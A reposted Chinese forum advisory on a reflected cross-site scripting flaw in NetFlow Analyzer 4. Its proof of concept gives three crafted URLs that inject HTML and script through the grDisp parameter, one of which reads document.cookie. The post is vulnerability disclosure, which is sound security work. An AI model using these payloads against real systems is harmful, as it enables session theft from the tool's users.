[转载]NetFlow Analyzer 4跨站脚本漏洞以及测试方法
文章作者:why (at) nsfocus (dot) comI encountered Cross Site Scripting Vulnerabilities in some files of the NetFlow Analyzer 4, with this files, sending a specially crafted url you can execute commands in the client side.
____Proof of Concept______
[url]http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grD[/url]
isp=<h1>test</h1>
[url]http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grD[/url]
isp=<script>alert("test")</script>
[url]http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grD[/url]
isp=<script>alert(document.cookie)</script>
页:
[1]